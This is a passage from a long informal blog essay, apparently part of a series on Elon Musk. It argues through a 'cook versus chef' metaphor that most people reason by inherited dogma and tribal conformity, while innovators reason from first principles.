It makes sense, right? Creative thinking is a close cousin of first principles reasoning. In both cases, the thinker needs to invent his own thought pathways. People think of creativity as a natural born talent, but it’s actually much more of a way of thinking—it’s the thinking version of painting onto a blank canvas. But to do that requires brain software that’s skilled and practiced at coming up with new things, and school trains us on the exact opposite thing—to follow the leader, single-file, and to get really good at taking tests. Instead of a blank canvas, school hands kids a coloring book and tells them to stay within the lines.3
What this all amounts to is that during our brain’s most malleable years, parents, teachers, and society end up putting our clay in a mold and squeezing it tightly into a preset shape.
And when we grow up, without having learned how to build our own style of reasoning and having gone through the early soul-searching that independent thinking requires, we end up needing to rely on whatever software was installed in us for everything—software that, coming from parents and teachers, was probably itself designed 30 years ago.
30 years, if we’re lucky. Let’s think about this for a second.
Just say you have an overbearing mother who insists you grow up with her values, her worldview, her fears, and her ambitions—because she knows best, because it’s a scary world out there, because XYZ is respectable, because she said so.
Your head might end up running your whole life on “because mom says so” software. If you play the Why? game with something like the reason you’re in your current job, it may take a few Why’s to get there, but you’ll most likely end up hitting a concrete floor that says some version of “because mom says so.”
But why does mom say so?
Mom says so because her mom said so—after growing up in 1930s Poland, in a home where her dad said so because his dad—a minister from a small town outside Krakow—said so after his grandfather, who saw some terrible shit go down during the Siberian Uprising of 1866, ingrained in his children’s heads the critical life lesson to never associate with blacksmiths.
Through a long game of telephone, your mother now looks down upon office jobs and you find yourself feeling strongly that the only truly respectable career is in publishing. And you can list off a bunch of reasons why you feel that way—but if someone really grilled you on those reasons and on the reasoning beneath them, you’d end up in a confusing place. It gets confusing way down there because the first principles foundation at the bottom is a mishmash of the values and beliefs of a bunch of people from different generations and countries—a bunch of people who aren’t you.
A common example of this in today’s world is that many people I know were raised by people who were raised by people who went through the Great Depression. If you solicit career advice from someone born in the US in the 1920s, there’s a good chance you’ll get an answer pumped out by this software:
Grandma Software
The person has lived a long life and has made it all the way to 2015, but their software was coded during the Great Depression, and if they’re not the type to regularly self-reflect and evolve, they still do their thinking with software from the 1930s. And if they installed that same software in their children’s heads and their children then passed it on to their own children, a member of Generation Y today might feel too scared to pursue an entrepreneurial or artistic endeavor and be totally unaware that they’re actually being haunted by the ghost of the Great Depression.
When old software is installed on new computers, people end up with a set of values not necessarily based on their own deep thinking, a set of beliefs about the world not necessarily based on the reality of the world they live in, and a bunch of opinions they might have a hard time defending with an honest heart.
In other words, a whole lot of convictions not really based on actual data. We have a word for that.
Dogma
I don’t know what’s the matter with people: they don’t learn by understanding, they learn by some other way—by rote or something. Their knowledge is so fragile! —Richard Feynman
Dogma is everywhere and comes in a thousand different varieties—but the format is generally the same:
X is true because [authority] says so. The authority can be many things.
Because I said so 2
Dogma, unlike first principles reasoning, isn’t customized to the believer or her environment and isn’t meant to be critiqued and adjusted as things change. It’s not software to be coded—it’s a printed rulebook. Its rules may be originally based on reasoning by a certain kind of thinker in a certain set of circumstances, at a time far in the past or a place far away, or it may be based on no reasoning at all. But that doesn’t matter because you’re not supposed to dig too deep under the surface anyway—you’re just supposed to accept it, embrace it, and live by it. No evidence needed.
You may not like living by someone else’s dogma, but you’re left without much choice. When your childhood attempts at understanding are met with “Because I said so,” and you absorb the implicit message “Your own reasoning capability is shit, don’t even try, just follow these rules so you don’t fuck your life up,” you grow up with little confidence in your own reasoning process. When you’re never forced to build your own reasoning pathways, you’re able to skip the hard process of digging deep to discover your own values and the sometimes painful experience of testing those values in the real world and learning you want to adjust them—and so you grow up a total reasoning amateur.
Only strong reasoning skills can carve a unique life path, and without them, dogma will quickly have you living someone else’s life. Dogma doesn’t know you or care about you and is often completely wrong for you—it’ll have a would-be happy painter spending their life as a lawyer and a would-be happy lawyer spending their life as a painter.
But when you don’t know how to reason, you don’t know how to evolve or adapt. If the dogma you grew up with isn’t working for you, you can reject it, but as a reasoning amateur, going it alone usually ends with you finding another dogma lifeboat to jump onto—another rulebook to follow and another authority to obey. You don’t know how to code your own software, so you install someone else’s.
People don’t do any of this intentionally—usually if we reject a type of dogma, our intention is to break free of a life of dogmatic thinking altogether and brave the cold winds of independent reasoning. But dogmatic thinking is a hard habit to break, especially when it’s all you know. I have a friend who just had a baby, and she told me that she was so much more open-minded than her parents, because they wanted her to have a prestigious career, but she’d be open to her daughter doing anything. After a minute, she thought about it, and said, “Well actually, no, what I mean by that is if she wanted to go do something like spend her life on a farm in Montana, I’d be fine with that and my parents never would have been—but if she said she wanted to go work at a hedge fund, I’d kill her.” She realized mid-sentence that she wasn’t free of the rigid dogmatic thinking of her parents—she had just changed dogma brands.
This is the dogma trap, and it’s hard to escape from. Especially since dogma has a powerful ally—the group.
Tribes
Some things I think are very conservative, or very liberal. I think when someone falls into one category for everything, I’m very suspicious. It doesn’t make sense to me that you’d have the same solution to every issue. —Louis C.K.
What most dogmatic thinking tends to boil down to is another good Seth Godin phrase:
People like us do stuff like this.
It’s the rallying cry of tribalism.
There’s an important distinction to make here. Tribalism tends to have a negative connotation, but the concept of a tribe itself isn’t bad. All a tribe is is a group of people linked together by something they have in common—a religion, an ethnicity, a nationality, family, a philosophy, a cause. Christianity is a tribe. The Democratic Party is a tribe. Australians are a tribe. Radiohead fans are a tribe. Arsenal fans are a tribe. The musical theater scene in New York is a tribe. Temple University is a tribe. And within large, loose tribes, there are smaller, tighter, sub-tribes. Your extended family is a tribe, of which your immediate family is a sub-tribe. Americans are a tribe, of which Texans are a sub-tribe, of which Evangelical Christians in Amarillo, Texas is a sub-sub-tribe.
What makes tribalism a good or bad thing depends on the tribe member and their relationship with the tribe. In particular, one simple distinction:
Tribalism is good when the tribe and the tribe member both have an independent identity and they happen to be the same. The tribe member has chosen to be a part of the tribe because it happens to match who he really is. If either the identity of the tribe or the member evolves to the point where the two no longer match, the person will leave the tribe. Let’s call this conscious tribalism.
Tribalism is bad when the tribe and tribe member’s identity are one and the same. The tribe member’s identity is determined by whatever the tribe’s dogma happens to say. If the identity of the tribe changes, the identity of the tribe member changes with it in lockstep. The tribe member’s identity can’t change independent of the tribal identity because the member has no independent identity. Let’s call this blind tribalism.
With conscious tribalism, the tribe member and his identity come first. The tribe member’s identity is the alpha dog, and who he is determines the tribes he’s in. With blind tribalism, the tribe comes first. The tribe is the alpha dog, and it’s the tribe that determines who he is.
This isn’t black and white—it’s a spectrum—but when someone is raised without strong reasoning skills, they may also lack a strong independent identity and end up vulnerable to the blind tribalism side of things—especially with the various tribes they were born into. That’s what Einstein was getting at when he said, “Few people are capable of expressing with equanimity opinions which differ from the prejudices of their social environment. Most people are even incapable of forming such opinions.”
A large tribe like a religion or a political party or a nation will contain members who fall across the whole range of the blind-to-conscious spectrum. But some tribes, by their nature, attract a certain type of follower. It makes logical sense that the more rigid, certain, and dogmatic the tribe, the more likely it is to attract blind tribe members. ISIS is going to have a far higher percentage of blind tribe members than the London Philosophy Club.
The allure of dogmatic tribes makes sense—they appeal to very core parts of human nature.
Humans crave connection and camaraderie, and a guiding dogma is a common glue to bond together a group of unique individuals as one.
Humans want internal security, and for someone who grows up feeling shaky about their own distinctive character, a tribe and its guiding dogma is a critical lifeline—a one-stop shop for a full suite of human opinions and values.
Humans also long for the comfort and safety of certainty, and nowhere is conviction more present than in the groupthink of blind tribalism. While a scientist’s data-based opinions are only as strong as the evidence she has and inherently subject to change, tribal dogmatism is an exercise in faith, and with no data to be beholden to, blind tribe members believe what they believe with certainty.
We discussed why math has proofs, why science has theories, and why in life we should probably limit ourselves to hypotheses—but blind tribalism proceeds with the confidence of the mathematician:
Given (because the tribe says so): A = B
Given (because the tribe says so): B = C + D
Therefore (because the tribe says so): A = C + D
And since so many others in the tribe feel certain about things, your own certainty is reassured and reinforced.
But there’s a heavy cost to these comforts. Insecurity can be solved the hard way or the easy way—and by giving people the easy option, dogmatic tribes remove the pressure to do the hard work of evolving into a more independent person with a more internally-defined identity. In that way, dogmatic tribes are an enabler of the blind tribe member’s deficiencies.
The sneaky thing about both rigid tribal dogma and blind membership is that they like to masquerade as open-minded thought with conscious membership. I think many of us may be closer to the blind membership side of things with certain tribes we’re a part of than we recognize—and those tribes we’re a part of may not be as open-minded as we tend to think.
A good test for this is the intensity of the us factor. That key word in “People like us do stuff like this” can get you into trouble pretty quickly.
Us feels great. A major part of the appeal of being in a tribe is that you get to be part of an Us, something humans are wired to seek out. And a loose Us is nice—like the Us among conscious, independent tribe members.
But the Us in blind tribalism is creepy. In blind tribalism, the tribe’s guiding dogma doubles as the identity of the tribe members, and the Us factor enforces that concept. Conscious tribe members reach conclusions—blind tribe members are conclusions. With a blind Us, if the way you are as an individual happens to contain opinions, traits, or principles that fall outside the outer edges of the dogma walls, they will need to be shed—or things will get ugly. By challenging the dogma of your tribe, you’re challenging both the sense of certainty the tribe members gain their strength from and the clear lines of identity they rely on.
The best friend of a blind Us is its nemesis—Them. Nothing unites Us like a collectively hated anti-Us, and the blind tribe is usually defined almost as much by hating the dogma of Them as it is by abiding by the dogma of Us.
Whatever element of rigid, identity-encompassing blindness is present in your own tribal life will reveal itself when you dare to validate any part of the rival Them dogma.
Give it a try. The next time you’re with a member of a tribe you’re a part of, express a change of heart that aligns you on a certain topic with whoever your tribe considers to be Them. If you’re a religious Christian, tell people at church you’re not sure anymore that there’s a God. If you’re an artist in Boulder, explain at the next dinner party that you think global warming might actually be a liberal hoax. If you’re an Iraqi, tell your family that you’re feeling pro-Israel lately. If you and your husband are staunch Republicans, tell him you’re coming around on Obamacare. If you’re from Boston, tell your friends you’re pulling for the Yankees this year because you like their current group of players.
If you’re in a tribe with a blind mentality of total certainty, you’ll probably see a look of horror. It won’t just seem wrong, it’ll seem like heresy. They might get angry, they might passionately try to convince you otherwise, they might cut off the conversation—but there will be no open-minded conversation. And because identity is so intertwined with beliefs in blind tribalism, the person actually might feel less close to you afterwards. Because for rigidly tribal people, a shared dogma plays a more important role in their close relationships than they might recognize.
Most of the major divides in our world emerge from blind tribalism, and on the extreme end of the spectrum—where people are complete sheep—blind tribalism can lead to terrifying things. Like those times in history when a few charismatic bad guys built a large army of loyal foot soldiers just by displaying strength and passion. Because blind tribalism is the true villain behind our grandest-scale atrocities—
[Image: Equations]
Most of us probably wouldn’t have joined the Nazi party, because most of us aren’t on the extreme end of the blind-to-conscious spectrum. But I don’t think many of us are on the other end either. Instead, we’re usually somewhere in the hazy middle—in the land of cooks.4
The Cook and the Chef
The difference between the way Elon thinks and the way most people think is kind of like the difference between a cook and a chef.
The words “cook” and “chef” seem kind of like synonyms. And in the real world, they’re often used interchangeably. But in this post, when I say chef, I don’t mean any ordinary chef. I mean the trailblazing chef—the kind of chef who invents recipes. And for our purposes, everyone else who enters a kitchen—all those who follow recipes—is a cook.
Everything you eat—every part of every cuisine we know so well—was at some point in the past created for the first time. Wheat, tomatoes, salt, and milk go back a long time, but at some point, someone said, “What if I take those ingredients and do this…and this…..and this……” and ended up with the world’s first pizza. That’s the work of a chef.
Since then, god knows how many people have made a pizza. That’s the work of a cook.
The chef reasons from first principles, and for the chef, the first principles are raw edible ingredients. Those are her puzzle pieces and she works her way upwards from there, using her experience, her instincts, and her taste buds.
The cook works off of some version of what’s already out there—a recipe of some kind, a meal she tried and liked, a dish she watched someone else make.
Cooks span a wide range. On one end, you have cooks who only cook by following a recipe to a T—carefully measuring every ingredient exactly the way the recipe dictates. The result is a delicious meal that tastes exactly the way the recipe designed it. Down the range a bit, you have more of a confident cook—someone with experience who gets the general gist of the recipe and then uses her skills and instincts to do it her own way. The result is something a little more unique to her style that tastes like the recipe, but not quite. At the far end of the cook range, you have an innovator who makes her own concoctions. A lamb burger with a vegetable bun, a peanut butter and jelly pizza, a cinnamon pumpkin seed cake.5
But what all of these cooks have in common is that their starting point is something that already exists. Even the innovative cook is still making a version of a burger, a pizza, or a cake.
At the very end of the spectrum, you have the chef. A chef might make good food or terrible food, but whatever she makes, it’s a result of her own reasoning process, from the selection of raw ingredients at the bottom to the finished dish at the top.
[Image: Chef-Cook Spectrum]
In the culinary world, there’s nothing wrong with being a cook. Most people are cooks because for most people, inventing recipes isn’t a goal of theirs.
But in life—when it comes to the reasoning “recipes” we use to churn out a decision—we may want to think twice about where we are on the cook-chef spectrum.
On a typical day, a “reasoning cook” and a “reasoning chef” don’t operate that differently. Even the chef becomes quickly exhausted by the mental energy required for first principles reasoning, and usually, doing so isn’t worth his time. Both types of people spend an average day with their brain software running on auto-pilot and their conscious decision-making centers dormant.
But then comes a day when something new needs to be figured out. Maybe the cook and the chef are each given the new task at work to create a better marketing strategy. Or maybe they’re unhappy with that job and want to think of what business to start. Maybe they have a crush on someone they never expected to have feelings for and they need to figure out what to do about it.
Whatever this new situation is, auto-pilot won’t suffice—this is something new and neither the chef’s nor the cook’s software has done this before. Which leaves only two options:
Create. Or copy.
The chef says, “Ugh okay, here we go,” rolls up his sleeves, and does what he always does in these situations—he switches on the active decision-making part of his software and starts to go to work. He looks at what data he has and seeks out what more he needs. He thinks about the current state of the world and reflects on where his values and priorities are. He gathers together those relevant first principles ingredients and starts puzzling together a reasoning pathway. It takes some hard work, but eventually, the pathway brings him to a hypothesis. He knows it’s probably wrong-ish, and as new data emerges, he’ll “taste-test” the hypothesis and adjust it. He keeps the decision-making center on standby for the next few weeks as he makes a bunch of early adjustments to the flawed hypothesis—a little more salt, a little less sugar, one prime ingredient that needs to be swapped out for another. Eventually, he’s satisfied enough with how things are going to move back into auto-pilot mode. This new decision is now part of the automated routine—a new recipe is in the cookbook—and he’ll check in on it to make adjustments every once in a while or as new pertinent data comes in, the way he does for all parts of his software.
The cook has no idea what’s going on in the last paragraph. The reasoning cook’s software is called “Because the recipe said so,” and it’s more of a computerized catalog of recipes than a computer program. When the cook needs to make a life decision, he goes through his collection of authority-written recipes, finds the one he trusts in that particular walk of life, and reads through the steps to see what to do—kind of like WWJD, except the J is replaced by whatever authority is most trusted in that area. For most questions, the authority is the tribe, since the cook’s tribal dogma covers most standard decisions. But in this particular case, the cook leafed through the tribe’s cookbook and couldn’t find any section about this type of decision. So he needs to get a hold of a recipe from another authority he trusts with this type of thing. Once the cook finds the right recipe, he can put it in his catalog and use it for all future decisions on this matter.
First, the cook tries a few friends. His catalog doesn’t have the needed info, but maybe one of theirs does. He asks them for their advice—not so he can use it as additional thinking to supplement his own, but so it can become his own thinking.
If that doesn’t yield any strongly-opinionated results, he’ll go to the trusty eternal backstop—conventional wisdom.
Society as a whole is its own loose tribe, often spanning your whole nation or even your whole part of the world, and what we call “conventional wisdom” is its guiding dogma cookbook—online and available to the public. Typically, the larger the tribe, the more general and more outdated the dogma—and the conventional wisdom database runs like a DMV website last updated in 1992. But when the cook has nowhere else to turn, it’s like a trusty old friend.
And in this case—let’s say the cook is thinking of starting a business and wants to know what the possibilities are—conventional wisdom has him covered. He types the command into the interface, waits a few minutes, and then the system pumps out its answer:
[Image: CWDOS]
The cook, thoroughly discouraged, thanks the machine and updates his Reality box accordingly.
[Image: Cook reality box]
With the decision made (not to start a business), he switches his software back into auto-pilot mode. Done and done.
Musk calls the cook’s way of thinking “reasoning by analogy” (as opposed to reasoning by first principles), which is a nice euphemism. The next time a kid gets caught copying answers from another student’s exam during the test, he should just explain that he was reasoning by analogy.
If you start looking for it, you’ll see the chef/cook thing happening everywhere. There are chefs and cooks in the worlds of music, art, technology, architecture,6 writing, business, comedy, marketing, app development, football coaching, teaching, and military strategy. Sometimes the chef is the one brave enough to go for something big—other times, the chef is the one with the strength of character to step out of the game and revert back to the small. And in each case, though both parties are usually just on autopilot, mindlessly playing the latest album again and again at concerts, it’s in those key moments when it’s time to write a new album—those moments of truth in front of a clean canvas, a blank Word doc, an empty playbook, a new sheet of blueprint paper, a fresh whiteboard—that the chef and the cook reveal their true colors. The chef creates, while the cook, in some form or another, copies.
[Image: Line of cooks]
And the difference in outcome is enormous. For cooks, even the more innovative kind, there’s almost always a ceiling on the size of the splash they can make in the world, unless there’s some serious luck involved. Chefs aren’t guaranteed to do anything good, but when there’s a little talent and a lot of persistence, they’re almost certain to make a splash.
No one talks about the “reasoning industry,” but we’re all part of it, and when it comes to chefs and cooks, it’s no different than any other industry. We’re working in the reasoning industry every time we make a decision.
Your current life, with all its facets and complexity, is like a reasoning industry album. The question is, how did that set of songs come to be? How were the songs composed, and by whom? And in those critical do-or-die moments when it’s time to write a new song, how do you do your creating? Do you dig deep into yourself? Do you start with the drumbeat and chords of an existing song and write your own melody on top of it? Do you just play covers?
I know what you want the answers to these questions to be. This is a straightforward one—it’s clearly better to be a chef. But unlike the case with most major distinctions in life—hard-working vs. lazy, ethical vs. dishonest, considerate vs. selfish—when the chef/cook distinction passes right in front of us, we often don’t even notice it’s there.
Missing the Distinction
Like the culinary world’s cook-to-chef range, the real world’s cook-to-chef range isn’t binary—it lies on a spectrum:
[Image: Chef-Cook Life Spectrum]
But I’m pretty sure that when most of us look at that spectrum, we think we’re farther to the right than we actually are. We’re usually more cook-like than we realize—we just can’t see it from where we’re standing.
For example—
Cooks are followers—by definition. They’re a cook because in whatever they’re doing, they’re following some kind of recipe. But most of us don’t think of ourselves as followers.
A follower, we think, is a weakling with no mind of their own. We think about leadership positions we’ve held and initiatives we’ve taken at work and the way we never let friends boss us around, and we take these as evidence that we’re no follower. Which in turn means that we’re not just a cook.
But the problem is—the only thing all of that proves is that you’re no follower within your tribe. As Einstein meanly put it:
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
In other words, you might be a star and a leader in your world or in the eyes of your part of society, but if the core reason you picked that goal in the first place was because your tribe’s cookbook says that it’s an impressive thing and it makes the other tribe members gawk, you’re not being a leader—you’re being a super-successful follower. And, as Einstein says, no less of a cook than all those whom you’ve impressed.
To see the truth, you need to zoom way out until you can see the real leader of the cooks—the cookbook.
But we don’t tend to zoom out, and when we look around at our life, zoomed in, what appears to be a highly unique and independent self may be an optical illusion.7 What often feels like independent reasoning when zoomed out is actually playing connect-the-dots on a pre-printed set of steps laid out by someone else. What feel like personal principles might just be the general tenets of your tribe. What feel like original opinions may have actually been spoon-fed to us by the media or our parents or friends or our religion or a celebrity. What feels like Roark might actually be Keating. What feels like our chosen life path could just be one of a handful of pre-set, tribe-approved yellow brick roads. What feels like creativity might be filling in a coloring book—and making sure to stay inside the lines.
Because of this optical illusion, we’re unable to see the flaws in our own thinking or recognize an unusually great thinker when we see one. Instead, when a superbly science-minded, independent-thinking chef like Elon Musk or Steve Jobs or Albert Einstein comes around, what do we attribute their success to?
Awesome fucking hardware.
When we look at Musk, we see someone with genius, with vision, with superhuman balls. All things, we assume, he was more or less born with. So to us, the spectrum looks more like this:
[Image: Chef-Cook Life Spectrum, skewed]
The way we see it, we’re all a bunch of independent-thinking chefs—and it’s just that Musk is a really impressive chef.
Which is both A) overrating Musk and B) overrating ourselves. And completely missing the real story.
Musk is an impressive chef for sure, but what makes him such an extreme standout isn’t that he’s impressive—it’s that most of us aren’t chefs at all.
It’s like a bunch of typewriters looking at a computer and saying, “Man, that is one talented typewriter.”
The reason we have such a hard time seeing what’s really going on is that we don’t get that brain software is even a thing. We don’t think of brains as computers, so we don’t think about the distinction between hardware and software at all. When we think about the brain, we think only about the hardware—the thing we’re born with and are powerless to change or improve. Much less tangible to us is the concept of how we reason. We see reasoning as a thing that just kind of happens, like our bodies’ blood flow—a process that runs on its own, with not much else to say or do about it.
And if we can’t even see the hardware/software distinction, we certainly can’t see the more nuanced chef software vs. cook software distinction.
By not seeing our thinking software for what it is—a critical life skill, something that can be learned, practiced, and improved, and the major factor that separates the people who do great things from those who don’t—we fail to realize where the game of life is really being played. We don’t recognize reasoning as a thing that can be created or copied—and in the same way that causes us to mistake our own cook-like behavior for independent reasoning, we then mistake the actual independent reasoning of the chef for exceptional and magical abilities.
Three examples:
1) We mistake the chef’s clear view of the present for vision into the future.
Musk’s sister Tosca said “Elon has already gone to the future and come back to tell us what he’s found.”7 This is how a lot of people feel about Musk—that he’s a visionary, that he can somehow see things we cannot. We see it like this:
[Image: Musk Visionary 1]
But actually, it’s like this:
[Image: Musk Visionary 2]
Conventional wisdom is slow to move, and there’s significant lag time between when something becomes reality and when conventional wisdom is revised to reflect that reality. And by the time it does, reality has moved on to something else. But chefs don’t pay attention to that, reasoning instead using their eyes and ears and experience. By ignoring conventional wisdom in favor of simply looking at the present for what it really is and staying up-to-date with the facts of the world as they change in real-time—in spite of what conventional wisdom has to say—the chef can act on information the rest of us haven’t been given permission to act on yet.
2) We mistake the chef’s accurate understanding of risk for courage.
Remember this ElonSpeak quote from earlier?
When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.8
That’s just a kid chef assessing the actual facts of a situation and deciding that his fear was misplaced.
As an adult, Musk said this:
Sometimes people fear starting a company too much. Really, what’s the worst that could go wrong? You’re not gonna starve to death, you’re not gonna die of exposure—what’s the worst that could go wrong?
Same quote, right?
In both cases, Musk is essentially saying, “People consider X to be scary, but their fear is not based on logic, so I’m not scared of X.” That’s not courage—that’s logic.
Courage means doing something risky. Risk means exposing yourself to danger. We intuitively understand this—that’s why most of us wouldn’t call child Elon courageous for sleeping with the lights off. Courage would be a weird word to use there because no actual danger was involved.
All Elon’s saying in the second quote is that being scared to start a company is the adult version of being scared of the dark. It’s not actually dangerous.
So when Musk put his entire fortune down on SpaceX and Tesla, was he being bold as fuck? Sure. But courageous? Not the right word. It was a case of a chef taking a bunch of information he had and puzzling together a plan that seemed logical. It’s not that he was sure he’d succeed—in fact, he thought SpaceX in particular had a reasonable probability of failure—it’s just that nowhere in his assessments did he foresee danger.
3) We mistake the chef’s originality for brilliant ingenuity.
People believe thinking outside the box takes intelligence and creativity, but it’s mostly about independence. When you simply ignore the box and build your reasoning from scratch, whether you’re brilliant or not, you end up with a unique conclusion—one that may or may not fall within the box.
When you’re in a foreign country and you decide to ditch the guidebook and start wandering aimlessly and talking to people, unique things always end up happening. When people hear about those things, they’ll think of you as a pro traveler and a bold adventurer—when all you really did is ditch the guidebook.
Likewise, when an artist or scientist or businessperson chef reasons independently instead of by analogy, and their puzzling happens to both A) turn out well and B) end up outside the box, people call it innovation and marvel at the chef’s ingenuity. When it turns out really well, all the cooks do what they do best—copy—and now it’s called a revolution.
Simply by refraining from reasoning by analogy, the chef opens up the possibility of making a huge splash with every project. When Steve Jobs8 and Apple turned their attention to phones, they didn’t start by saying, “Okay well people seem to like this kind of keyboard more than that kind, and everyone seems unhappy with the difficulty of hitting the numbers on their keyboards—so let’s get creative and make the best phone keyboard yet!” They simply asked, “What should a mobile device be?” and in their from-scratch reasoning, a physical keyboard didn’t end up as part of the plan at all. It didn’t take genius to come up with the design of the iPhone—it’s actually pretty logical—it just took the ability to not copy.
Different version of the same story with the invention of the United States. When the American forefathers found themselves with a new country on their hands, they didn’t ask, “What should the rules be for selecting our king, and what should the limitations of his power be?” A king to them was what a physical keyboard was to Apple. Instead, they asked, “What should a country be and what’s the best way to govern a group of people?” and by the time they had finished their puzzling, a king wasn’t part of the picture—their first principles reasoning led them to believe that John Locke had a better plan and they worked their way up from there.
History is full of the stories of chefs creating revolutions of apparent ingenuity through simple first principles reasoning. Genghis Khan organizing a smattering of tribes that had been fragmented for centuries using a powers-of-ten system in order to build one grand tribe that could sweep the world. Henry Ford creating cars with the out-of-the-box manufacturing technique of assembly-line production in order to bring cars to the masses for the first time. Marie Curie using unconventional methods to pioneer the theory of radioactivity and overturn the “atoms are indivisible” assumption (she won a Nobel Prize in both physics and chemistry—two prizes reserved exclusively for chefs). Martin Luther King taking a nonviolent Thoreau approach to a situation normally addressed by riots. Larry Page and Sergey Brin ignoring the commonly-used methods of searching the internet in favor of what they saw as a more logical system that based page importance on the number of important sites that linked to it. The 1966 Beatles deciding to stop being the world’s best cooks, ditch the typical songwriting styles of early-60s bands (including their own), and become music chefs, creating a bunch of new types of songs from scratch that no one had heard before.
Whatever the time, place, or industry, anytime something really big happens, there’s almost always an experimenting chef at the center of it—not being anything magical, just trusting their brain and working from scratch. Our world, like our cuisines, was created by these people—the rest of us are just along for the ride.
Yeah, Musk is smart as fuck and insanely ambitious—but that’s not why he’s beating us all. What makes Musk so rad is that he’s a software outlier. A chef in a world of cooks. A science geologist in a world of flood geologists. A brain software pro in a world where people don’t realize brain software is a thing.
That’s Elon Musk’s secret sauce.
Which is why the real story here isn’t Musk. It’s us.
The real puzzle in this series isn’t why Elon Musk is trying to end the era of gas cars or why he’s trying to land a rocket or why he cares so much about colonizing Mars—it’s why Elon Musk is so rare.
The curious thing about the car industry isn’t why Tesla is focusing so hard on electric cars, and the curious thing about the aerospace industry isn’t why SpaceX is trying so hard to make rockets reusable—the fascinating question is why they’re the only companies doing so.
We spent this whole time trying to figure out the mysterious workings of the mind of a madman genius only to realize that Musk’s secret sauce is that he’s the only one being normal. And in isolation, Musk would be a pretty boring subject—it’s the backdrop of us that makes him interesting. And it’s that backdrop that this series is really about.
So…what’s the deal with us? How did we end up so scared and cook-like? And how do we learn to be more like the chefs of the world, who seem to so effortlessly carve their own way through life? I think it comes down to three things.
How to Be a Chef
Anytime there’s a curious phenomenon within humanity—some collective insanity we’re all suffering from—it usually ends up being evolution’s fault. This story is no different.
When it comes to reasoning, we’re biologically inclined to be cooks, not chefs, which relates back to our tribal evolutionary past. First, it’s a better tribal model for most people to be cooks. In 50,000 BC, tribes full of independent thinkers probably suffered from having too many chefs in the kitchen, which would lead to too many arguments and factions within the tribe. A tribe with a strong leader at the top and the rest of the members simply following the leader would fare better. So those types of tribes passed on their genes more. And now we’re the collective descendants of the more cook-like people.
Second, it’s about our own well-being. It’s not in our DNA to be chefs because human self-preservation never depended upon independent thinking—it rode on fitting in with the tribe, on staying in favor with the chief, on following in the footsteps of the elders who knew more about staying alive than we did. And on teaching our children to do the same—which is why we now live in a cook society where cook parents raise their kids by telling them to follow the recipe and stop asking questions about it.
Thinking like cooks is what we’re born to do because what we’re born to do is survive.
But the weird thing is, we weren’t born into a normal human world. We’re living in the anomaly, when for many of the world’s people, survival is easy. Today’s privileged societies are full of anomaly humans whose primary purpose is already taken care of, softening the deafening roar of unmet base needs and allowing the nuanced and complex voice of our inner selves to awaken.
The problem is, most of our heads are still running on some version of the 50,000-year-old survival software—which kind of wastes the good luck we have to be born now.
It’s an unfortunate catch-22—we continue to think like cooks because we can’t absorb the epiphany that we live in an anomaly world where there’s no need to be cooks, and we can’t absorb that epiphany because we think like cooks and cooks don’t know how to challenge and update their own software.
This is the vicious cycle of our time—and the secret of the chef is that they somehow snapped out of it.
So how do we snap out of the trance?
I think there are three major epiphanies we need to absorb—three core things the chef knows that the cook doesn’t:
Epiphany 1) You don’t know shit.
[Image: You don't know shit]
The flood geologists of the 17th and 18th centuries weren’t stupid. And they weren’t anti-science. Many of them were just as accomplished in their fields as their science geologist colleagues.
But they were victims—victims of a religious dogma they were told to believe without question. The recipe they followed was scripture, a recipe that turned out to be wrong. And as a result, they proceeded on their path with a fatal flaw in their thinking—a software bug that told them that one of the undeniable first principles when thinking about the Earth was that it began 6,000 years ago and that there had been a flood of the most epic proportions.
With that bug in place, all further computations were moot. Any reasoning tree that puzzled upwards with those assumptions at its root had no chance of finding truth.
Even more than being victims of any dogma, the flood geologists were victims of their own certainty. Without certainty, dogma has no power. And when data is required in order to believe something, false dogma has no legs to stand on. It wasn’t the church dogma that hindered the flood geologists, it was the church mentality of faith-based certainty.
That’s what Stephen Hawking meant when he said, “The greatest enemy of knowledge is not ignorance, it is the illusion of knowledge.” Neither the science geologist nor the flood geologist started off with knowledge. But what gave the science geologist the power to seek out the truth was knowing that he had no knowledge. The science geologists subscribed to the lab mentality, which starts by saying “I don’t know shit” and works upwards from there.
If you want to see the lab mentality at work, just search for famous quotes of any prominent scientist and you’ll see each one of them expressing the fact that they don’t know shit.
Here’s Isaac Newton: To myself I am only a child playing on the beach, while vast oceans of truth lie undiscovered before me.
And Richard Feynman: I was born not knowing and have had only a little time to change that here and there.
And Niels Bohr: Every sentence I utter must be understood not as an affirmation, but as a question.
Musk has said his own version: You should take the approach that you’re wrong. Your goal is to be less wrong.9
The reason these outrageously smart people are so humble about what they know is that as scientists, they’re aware that unjustified certainty is the bane of understanding and the death of effective reasoning. They firmly believe that reasoning of all kinds should take place in a lab, not a church.
If we want to become more chef-like, we have to make sure we’re doing our thinking in a lab. Which means identifying which parts of our thinking are currently sitting in church.
But that’s a hard thing to do because most of us have the same relationship with our own software that my grandmother has with her computer:9 It’s this thing someone put there, we use it when we need to, it somehow magically works, and we hope it doesn’t break. It’s the way we are with a lot of the things we own, where we’re just the dumb user, not the pro. We know how to use our car, microwave, phone, our electric toothbrush, but if something breaks, we take it to the pro to fix it because we have no idea how it works.
But that’s not a great life model when it comes to brain software, and it usually leads to us making the same mistakes and living with the same results year after year after year, because our software remains unchanged. Eventually, we might wake up one day feeling like Breaking Bad’s Walter White, when he said, “Sometimes I feel like I never actually make, any of my own… choices. I mean, my entire life it just seems I never… had a real say about any of it.” If we want to understand our own thinking, we have to stop being the dumb user of our own software and start being the pro—the auto mechanic, the electrician, the computer geek.
If you were alone in a room with a car and wanted to figure out how it worked, you’d probably start by taking it apart as much as you could and examining the parts and how they all fit together. To do the same with our thinking, we need to revert to our four-year-old selves and start deconstructing our software by resuming the Why game our parents and teachers shut down decades ago. It’s time to roll up our sleeves, pop open the hood, and get our hands dirty with a bunch of not-that-fun questions about what we truly want, what’s truly possible, and whether the way we’re living our lives follows logically from those things.
